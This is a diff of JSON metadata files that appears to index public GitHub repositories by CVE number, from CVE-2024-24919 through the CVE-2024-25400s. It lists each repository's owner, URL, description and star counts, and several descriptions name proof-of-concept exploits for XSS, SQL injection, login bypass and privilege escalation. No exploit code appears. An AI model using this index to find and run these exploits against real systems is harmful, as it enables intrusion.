"2024-07-26T15:17:58Z", + "updated_at": "2024-07-26T15:23:05Z", + "pushed_at": "2024-07-26T15:23:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 849356755, + "name": "Arbitrary-File-Read-CVE-2024-24919", + "full_name": "LuisMateo1\/Arbitrary-File-Read-CVE-2024-24919", + "owner": { + "login": "LuisMateo1", + "id": 172660352, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172660352?v=4", + "html_url": "https:\/\/github.com\/LuisMateo1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LuisMateo1\/Arbitrary-File-Read-CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-08-29T12:59:40Z", + "updated_at": "2024-08-29T14:37:35Z", + "pushed_at": "2024-08-29T14:37:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 850398760, + "name": "Event-ID-263-Rule-Name-SOC287---Arbitrary-File-Read-on-Checkpoint-Security-Gateway-CVE-2024-24919-", + "full_name": "AhmedMansour93\/Event-ID-263-Rule-Name-SOC287---Arbitrary-File-Read-on-Checkpoint-Security-Gateway-CVE-2024-24919-", + "owner": { + "login": "AhmedMansour93", + "id": 179945455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179945455?v=4", + "html_url": "https:\/\/github.com\/AhmedMansour93", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AhmedMansour93\/Event-ID-263-Rule-Name-SOC287---Arbitrary-File-Read-on-Checkpoint-Security-Gateway-CVE-2024-24919-", + "description": "🔍 Just wrapped up an incident report on a Phishing Alert (Event ID 257, SOC282). Enhancing my expertise in email threat detection and response! 🚨 #Cybersecurity #SOCAnalyst #LetsDefend", + "fork": false, + "created_at": "2024-08-31T16:57:06Z", + "updated_at": "2024-08-31T16:58:23Z", + "pushed_at": "2024-08-31T16:58:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864811586, + "name": "CVE-2024-24919", + "full_name": "geniuszlyy\/CVE-2024-24919", + "owner": { + "login": "geniuszlyy", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszlyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszlyy\/CVE-2024-24919", + "description": "PoC script for CVE-2024-24919 vulnerability. It scans a list of target URLs to identify security issues by sending HTTP POST requests and analyzing server responses", + "fork": false, + "created_at": "2024-09-29T08:20:56Z", + "updated_at": "2024-10-06T16:40:54Z", + "pushed_at": "2024-09-29T08:24:06Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "buffer-overflow", + "cve", + "cve-2024-24919", + "cybersecurity", + "ethical-hacking", + "exploit", + "exploit-development", + "linux", + "overflow", + "penetration-testing", + "poc", + "security", + "vulnerability", + "vulnerability-research" + ], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 870254088, + "name": "CVE-2024-24919", + "full_name": "skyrowalker\/CVE-2024-24919", + "owner": { + "login": "skyrowalker", + "id": 156471538, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156471538?v=4", + "html_url": "https:\/\/github.com\/skyrowalker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skyrowalker\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-10-09T17:54:28Z", + "updated_at": "2024-10-11T00:53:35Z", + "pushed_at": "2024-10-10T13:34:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 879969031, + "name": "CVE-2024-24919_POC", + "full_name": "sar-3mar\/CVE-2024-24919_POC", + "owner": { + "login": "sar-3mar", + "id": 105809777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105809777?v=4", + "html_url": "https:\/\/github.com\/sar-3mar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sar-3mar\/CVE-2024-24919_POC", + "description": "It's Proof of Concept on CVE-2024-24919-POC , i made it after it's discoverd ", + "fork": false, + "created_at": "2024-10-28T21:54:41Z", + "updated_at": "2024-10-28T22:08:32Z", + "pushed_at": "2024-10-28T22:08:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25092.json b/2024/CVE-2024-25092.json new file mode 100644 index 0000000000..dd637fd607 --- /dev/null +++ b/2024/CVE-2024-25092.json @@ -0,0 +1,33 @@ +[ + { + "id": 757380747, + "name": "CVE-2024-25092", + "full_name": "RandomRobbieBF\/CVE-2024-25092", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-25092", + "description": "NextMove Lite < 2.18.0 - Subscriber+ Arbitrary Plugin Installation\/Activation", + "fork": false, + "created_at": "2024-02-14T11:30:59Z", + "updated_at": "2024-07-11T16:39:09Z", + "pushed_at": "2024-02-14T11:32:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25153.json b/2024/CVE-2024-25153.json new file mode 100644 index 0000000000..447faf87dc --- /dev/null +++ b/2024/CVE-2024-25153.json @@ -0,0 +1,64 @@ +[ + { + "id": 771098779, + "name": "CVE-2024-25153", + "full_name": "nettitude\/CVE-2024-25153", + "owner": { + "login": "nettitude", + "id": 11998401, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11998401?v=4", + "html_url": "https:\/\/github.com\/nettitude", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nettitude\/CVE-2024-25153", + "description": "Proof-of-concept exploit for CVE-2024-25153.", + "fork": false, + "created_at": "2024-03-12T17:26:10Z", + "updated_at": "2024-11-20T16:30:42Z", + "pushed_at": "2024-03-13T09:46:07Z", + "stargazers_count": 42, + "watchers_count": 42, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 42, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 773709929, + "name": "CVE-2024-25153", + "full_name": "rainbowhatrkn\/CVE-2024-25153", + "owner": { + "login": "rainbowhatrkn", + "id": 147452376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/147452376?v=4", + "html_url": "https:\/\/github.com\/rainbowhatrkn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rainbowhatrkn\/CVE-2024-25153", + "description": "Proof-of-concept exploit for CVE-2024-25153.", + "fork": false, + "created_at": "2024-03-18T09:02:56Z", + "updated_at": "2024-03-18T09:03:33Z", + "pushed_at": "2024-03-18T09:09:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25169.json b/2024/CVE-2024-25169.json new file mode 100644 index 0000000000..220aea1828 --- /dev/null +++ b/2024/CVE-2024-25169.json @@ -0,0 +1,33 @@ +[ + { + "id": 763046588, + "name": "CVE-2024-25169-Mezzanine-v6.0.0", + "full_name": "shenhav12\/CVE-2024-25169-Mezzanine-v6.0.0", + "owner": { + "login": "shenhav12", + "id": 93703363, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93703363?v=4", + "html_url": "https:\/\/github.com\/shenhav12", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shenhav12\/CVE-2024-25169-Mezzanine-v6.0.0", + "description": null, + "fork": false, + "created_at": "2024-02-25T12:21:40Z", + "updated_at": "2024-02-25T12:27:53Z", + "pushed_at": "2024-02-25T12:34:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25170.json b/2024/CVE-2024-25170.json new file mode 100644 index 0000000000..c3689b79b8 --- /dev/null +++ b/2024/CVE-2024-25170.json @@ -0,0 +1,33 @@ +[ + { + "id": 763048747, + "name": "CVE-2024-25170-Mezzanine-v6.0.0", + "full_name": "shenhav12\/CVE-2024-25170-Mezzanine-v6.0.0", + "owner": { + "login": "shenhav12", + "id": 93703363, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93703363?v=4", + "html_url": "https:\/\/github.com\/shenhav12", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shenhav12\/CVE-2024-25170-Mezzanine-v6.0.0", + "description": null, + "fork": false, + "created_at": "2024-02-25T12:28:49Z", + "updated_at": "2024-02-25T12:28:50Z", + "pushed_at": "2024-02-25T12:31:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25175.json b/2024/CVE-2024-25175.json new file mode 100644 index 0000000000..b9db7f4ccd --- /dev/null +++ b/2024/CVE-2024-25175.json @@ -0,0 +1,33 @@ +[ + { + "id": 775961541, + "name": "CVE-2024-25175", + "full_name": "jet-pentest\/CVE-2024-25175", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2024-25175", + "description": null, + "fork": false, + "created_at": "2024-03-22T11:54:36Z", + "updated_at": "2024-03-22T11:54:36Z", + "pushed_at": "2024-03-22T12:01:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25202.json b/2024/CVE-2024-25202.json new file mode 100644 index 0000000000..55b0354df3 --- /dev/null +++ b/2024/CVE-2024-25202.json @@ -0,0 +1,33 @@ +[ + { + "id": 760675412, + "name": "CVE-2024-25202", + "full_name": "Agampreet-Singh\/CVE-2024-25202", + "owner": { + "login": "Agampreet-Singh", + "id": 73707055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73707055?v=4", + "html_url": "https:\/\/github.com\/Agampreet-Singh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Agampreet-Singh\/CVE-2024-25202", + "description": "A vulnerability was found in PHPgurukul visitor management system 1.0. it has been rated as problemic. Affected by the issue is some unknown functionality of the file search bar that called search-result.php and search-visitor.php . The vulnerability is Cross-Site-Scripting (XSS).", + "fork": false, + "created_at": "2024-02-20T18:19:53Z", + "updated_at": "2024-02-23T04:18:48Z", + "pushed_at": "2024-03-02T12:27:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25227.json b/2024/CVE-2024-25227.json new file mode 100644 index 0000000000..6704370368 --- /dev/null +++ b/2024/CVE-2024-25227.json @@ -0,0 +1,64 @@ +[ + { + "id": 762376764, + "name": "ABO.CMS-Login-SQLi-CVE-2024-25227", + "full_name": "thetrueartist\/ABO.CMS-Login-SQLi-CVE-2024-25227", + "owner": { + "login": "thetrueartist", + "id": 47917137, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47917137?v=4", + "html_url": "https:\/\/github.com\/thetrueartist", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thetrueartist\/ABO.CMS-Login-SQLi-CVE-2024-25227", + "description": null, + "fork": false, + "created_at": "2024-02-23T16:46:54Z", + "updated_at": "2024-03-13T19:47:28Z", + "pushed_at": "2024-03-13T19:43:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 771661416, + "name": "ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227", + "full_name": "thetrueartist\/ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227", + "owner": { + "login": "thetrueartist", + "id": 47917137, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47917137?v=4", + "html_url": "https:\/\/github.com\/thetrueartist", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thetrueartist\/ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227", + "description": null, + "fork": false, + "created_at": "2024-03-13T17:58:41Z", + "updated_at": "2024-03-13T19:48:07Z", + "pushed_at": "2024-03-22T17:01:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25270.json b/2024/CVE-2024-25270.json new file mode 100644 index 0000000000..6b56581e9e --- /dev/null +++ b/2024/CVE-2024-25270.json @@ -0,0 +1,33 @@ +[ + { + "id": 761648221, + "name": "CVE-2024-25270", + "full_name": "fbkcs\/CVE-2024-25270", + "owner": { + "login": "fbkcs", + "id": 44971422, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44971422?v=4", + "html_url": "https:\/\/github.com\/fbkcs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fbkcs\/CVE-2024-25270", + "description": "IDOR vulnerability in MIRAPOLIS LMS 4.6.X.X", + "fork": false, + "created_at": "2024-02-22T08:18:47Z", + "updated_at": "2024-09-11T05:14:04Z", + "pushed_at": "2024-09-11T05:12:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25277.json b/2024/CVE-2024-25277.json new file mode 100644 index 0000000000..b7db59e33b --- /dev/null +++ b/2024/CVE-2024-25277.json @@ -0,0 +1,33 @@ +[ + { + "id": 763137888, + "name": "CVE-2024-25277", + "full_name": "maen08\/CVE-2024-25277", + "owner": { + "login": "maen08", + "id": 48031010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48031010?v=4", + "html_url": "https:\/\/github.com\/maen08", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maen08\/CVE-2024-25277", + "description": "Resources and PoCs", + "fork": false, + "created_at": "2024-02-25T16:54:33Z", + "updated_at": "2024-04-23T19:11:25Z", + "pushed_at": "2024-04-23T19:11:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25278.json b/2024/CVE-2024-25278.json new file mode 100644 index 0000000000..0ab2a18a03 --- /dev/null +++ b/2024/CVE-2024-25278.json @@ -0,0 +1,33 @@ +[ + { + "id": 758896821, + "name": "CVE-2024-25278", + "full_name": "sajaljat\/CVE-2024-25278", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-25278", + "description": null, + "fork": false, + "created_at": "2024-02-17T11:59:51Z", + "updated_at": "2024-02-17T11:59:51Z", + "pushed_at": "2024-02-17T12:08:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25279.json b/2024/CVE-2024-25279.json new file mode 100644 index 0000000000..1fffac9264 --- /dev/null +++ b/2024/CVE-2024-25279.json @@ -0,0 +1,33 @@ +[ + { + "id": 758899753, + "name": "CVE-2024-25279", + "full_name": "sajaljat\/CVE-2024-25279", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-25279", + "description": "(XSS)", + "fork": false, + "created_at": "2024-02-17T12:10:12Z", + "updated_at": "2024-02-17T12:10:13Z", + "pushed_at": "2024-02-17T12:10:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25280.json b/2024/CVE-2024-25280.json new file mode 100644 index 0000000000..102453d1c5 --- /dev/null +++ b/2024/CVE-2024-25280.json @@ -0,0 +1,33 @@ +[ + { + "id": 758900244, + "name": "CVE-2024-25280", + "full_name": "sajaljat\/CVE-2024-25280", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-25280", + "description": "Broken Access control", + "fork": false, + "created_at": "2024-02-17T12:11:58Z", + "updated_at": "2024-02-17T12:13:43Z", + "pushed_at": "2024-02-17T12:13:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25281.json b/2024/CVE-2024-25281.json new file mode 100644 index 0000000000..1c56297b18 --- /dev/null +++ b/2024/CVE-2024-25281.json @@ -0,0 +1,33 @@ +[ + { + "id": 758901138, + "name": "CVE-2024-25281", + "full_name": "sajaljat\/CVE-2024-25281", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-25281", + "description": "(XSS)", + "fork": false, + "created_at": "2024-02-17T12:14:56Z", + "updated_at": "2024-02-17T12:14:56Z", + "pushed_at": "2024-02-17T12:15:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25291.json b/2024/CVE-2024-25291.json new file mode 100644 index 0000000000..f5bc807523 --- /dev/null +++ b/2024/CVE-2024-25291.json @@ -0,0 +1,33 @@ +[ + { + "id": 853174873, + "name": "CVE-2024-25291", + "full_name": "EQSTLab\/CVE-2024-25291", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-25291", + "description": "PoC for CVE-2024-25291", + "fork": false, + "created_at": "2024-09-06T06:15:35Z", + "updated_at": "2024-09-06T06:15:54Z", + "pushed_at": "2024-09-06T06:15:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25292.json b/2024/CVE-2024-25292.json new file mode 100644 index 0000000000..f337796da1 --- /dev/null +++ b/2024/CVE-2024-25292.json @@ -0,0 +1,33 @@ +[ + { + "id": 853175170, + "name": "CVE-2024-25292", + "full_name": "EQSTLab\/CVE-2024-25292", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-25292", + "description": "PoC for CVE-2024-25292", + "fork": false, + "created_at": "2024-09-06T06:16:29Z", + "updated_at": "2024-11-12T12:32:07Z", + "pushed_at": "2024-11-12T12:32:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25293.json b/2024/CVE-2024-25293.json new file mode 100644 index 0000000000..72c3695972 --- /dev/null +++ b/2024/CVE-2024-25293.json @@ -0,0 +1,33 @@ +[ + { + "id": 853173826, + "name": "CVE-2024-25293", + "full_name": "EQSTLab\/CVE-2024-25293", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-25293", + "description": "PoC for CVE-2024-25293", + "fork": false, + "created_at": "2024-09-06T06:12:32Z", + "updated_at": "2024-09-06T06:12:58Z", + "pushed_at": "2024-09-06T06:12:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25376.json b/2024/CVE-2024-25376.json new file mode 100644 index 0000000000..05a3e6cad5 --- /dev/null +++ b/2024/CVE-2024-25376.json @@ -0,0 +1,33 @@ +[ + { + "id": 762642991, + "name": "CVE-2024-25376-POC", + "full_name": "ewilded\/CVE-2024-25376-POC", + "owner": { + "login": "ewilded", + "id": 1158719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1158719?v=4", + "html_url": "https:\/\/github.com\/ewilded", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ewilded\/CVE-2024-25376-POC", + "description": "CVE-2024-25376 - Local Privilege Escalation in TUSBAudio", + "fork": false, + "created_at": "2024-02-24T09:30:45Z", + "updated_at": "2024-11-15T17:11:10Z", + "pushed_at": "2024-02-24T09:33:42Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25381.json b/2024/CVE-2024-25381.json new file mode 100644 index 0000000000..a1412620c0 --- /dev/null +++ b/2024/CVE-2024-25381.json @@ -0,0 +1,33 @@ +[ + { + "id": 751326986, + "name": "CVE-2024-25381", + "full_name": "Ox130e07d\/CVE-2024-25381", + "owner": { + "login": "Ox130e07d", + "id": 108753162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108753162?v=4", + "html_url": "https:\/\/github.com\/Ox130e07d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ox130e07d\/CVE-2024-25381", + "description": null, + "fork": false, + "created_at": "2024-02-01T11:42:48Z", + "updated_at": "2024-02-20T08:36:47Z", + "pushed_at": "2024-02-23T05:48:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25411.json b/2024/CVE-2024-25411.json new file mode 100644 index 0000000000..6246fc9481 --- /dev/null +++ b/2024/CVE-2024-25411.json @@ -0,0 +1,33 @@ +[ + { + "id": 864159582, + "name": "CVE-2024-25411", + "full_name": "paragbagul111\/CVE-2024-25411", + "owner": { + "login": "paragbagul111", + "id": 68190427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68190427?v=4", + "html_url": "https:\/\/github.com\/paragbagul111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paragbagul111\/CVE-2024-25411", + "description": "A cross-site scripting (XSS) vulnerability in Flatpress v1.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the username parameter in setup.php", + "fork": false, + "created_at": "2024-09-27T15:49:08Z", + "updated_at": "2024-09-27T16:02:54Z", + "pushed_at": "2024-09-27T16:02:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25412.json b/2024/CVE-2024-25412.json new file mode 100644 index 0000000000..53e2ae5ce7 --- /dev/null +++ b/2024/CVE-2024-25412.json @@ -0,0 +1,33 @@ +[ + { + "id": 864170495, + "name": "CVE-2024-25412", + "full_name": "paragbagul111\/CVE-2024-25412", + "owner": { + "login": "paragbagul111", + "id": 68190427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68190427?v=4", + "html_url": "https:\/\/github.com\/paragbagul111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paragbagul111\/CVE-2024-25412", + "description": "A cross-site scripting (XSS) vulnerability in Flatpress v1.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the email field", + "fork": false, + "created_at": "2024-09-27T16:13:26Z", + "updated_at": "2024-09-27T16:26:11Z", + "pushed_at": "2024-09-27T16:26:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25423.json b/2024/CVE-2024-25423.json new file mode 100644 index 0000000000..8291bab689 --- /dev/null +++ b/2024/CVE-2024-25423.json @@ -0,0 +1,33 @@ +[ + { + "id": 759283387, + "name": "cve-2024-25423", + "full_name": "DriverUnload\/cve-2024-25423", + "owner": { + "login": "DriverUnload", + "id": 83060593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83060593?v=4", + "html_url": "https:\/\/github.com\/DriverUnload", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DriverUnload\/cve-2024-25423", + "description": "Cinema 4D out-of-bounds write vulnerability when parsing c4d files", + "fork": false, + "created_at": "2024-02-18T06:35:31Z", + "updated_at": "2024-02-18T07:10:42Z", + "pushed_at": "2024-02-18T07:06:45Z", + "stargazers_count": 0, + 